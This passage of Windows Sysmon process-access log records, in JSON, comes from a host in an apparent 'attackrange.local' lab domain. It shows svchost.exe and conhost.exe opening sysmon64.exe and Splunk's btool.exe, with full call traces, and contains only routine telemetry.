C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-001069610500}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 